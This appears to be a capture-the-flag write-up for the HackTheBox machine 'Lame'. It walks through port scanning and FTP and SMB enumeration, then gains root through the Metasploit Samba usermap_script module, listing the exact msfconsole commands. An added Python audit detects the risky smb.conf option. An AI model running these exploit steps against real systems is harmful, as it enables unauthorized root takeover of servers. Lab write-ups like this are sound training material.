Lame

Lame writeup by Thamizhiniyan C S

Overview

Hello everyone. In this writeup we are going to solve Lame from HackTheBox.

Link for the machine : https://app.hackthebox.com/machines/1

Let's Start 🙌

Connect to the HTB server using the OpenVPN configuration file generated by HTB.

[ Click Here to learn more about how to connect to the VPN and access the boxes. ]

After connecting to the VPN service, click on Join Machine to access the machine's IP.

After joining the machine, you can see the IP address of the target machine.


Reconnaissance

Rustscan

First start the reconnaissance by running rustscan on the target IP address.

Command: rustscan -a 10.10.10.3 -- -A -Pn

Results

From the results, we got the following ports and services running:

| Port | Service     | Version              |
|------|-------------|----------------------|
| 21   | FTP         | vsftpd 2.3.4         |
| 22   | SSH         | OpenSSH 4.7p1        |
| 139  | netbios-ssn | Samba smbd 3.X - 4.X |
| 445  | netbios-ssn | Samba smbd 3.X - 4.X |
| 3632 | distccd     | distccd v1           |


Enumerating FTP

First, I started enumerating the FTP service running on Port 21.

From the scan results, we can see that anonymous login is allowed for FTP.

So I tried to log in as Anonymous.

Command: ftp 10.10.10.3

Username: Anonymous

Password: Anonymous

I found nothing in the anonymous FTP login.


Enumerating SMB

Next, I started to enumerate the SMB service running on port 139. I used the enum4linux tool to enumerate it.

Command: enum4linux -a 10.10.10.3

From the response of enum4linux, I didn't find any interesting shares.


Initial Access

Next, I searched for exploits for the Samba version (Samba smbd 3.X - 4.X) and found that this version is vulnerable to command execution.

To use the above exploit, execute the commands in msfconsole as follows:

use exploit/multi/samba/usermap_script

set RHOSTS 10.10.10.3

set LHOST tun0 (here tun0 is the interface of your Hack The Box VPN tunnel; Metasploit resolves it to that interface's IP)

run
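From the defender's side: the usermap_script module used above targets Samba's `username map script` smb.conf option, so a useful host check is whether that option is set at all. The following audit is an added example, not part of the original writeup; the function names, the sample configuration and the script path in it are constructed for illustration.

```python
import re

# smb.conf parameter that passes the client-supplied username to an external
# program. Flagging only this one option is this example's choice.
RISKY = {"usernamemapscript"}

def normalize(name):
    # Samba ignores case and whitespace inside parameter names.
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Yield (section, parameter, value) for every setting in smb.conf text."""
    section, pending = None, ""
    for raw in text.splitlines():
        stripped = raw.strip()
        # Blank lines and '#' / ';' comments are skipped unless we are
        # in the middle of a backslash-continued setting.
        if not pending and (not stripped or stripped[0] in "#;"):
            continue
        line = pending + stripped
        if line.endswith("\\"):          # setting continues on the next line
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            name, value = line.split("=", 1)
            yield section, normalize(name), value.strip()

def audit(text):
    """Return one finding per non-empty 'username map script' setting."""
    return [{"section": s, "parameter": p, "value": v}
            for s, p, v in parse_smb_conf(text) if p in RISKY and v]

# Constructed sample configuration, not taken from the target machine.
SAMPLE = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/\\
mapusers.sh
[tmp]
   path = /tmp
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("username map script is set:", finding)
```

A finding only reports that the option is set; whether the installed Samba release is a vulnerable one is a separate check.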


Getting the User Flag

Now we have access to the target machine as root. I searched for the user flag using the following command:

Command: find / -name user.txt

And we have found the user flag.


Getting the Root Flag

Now I searched for the root flag using the same method and found the root flag:

We have successfully found all the flags.

Thank You !!!
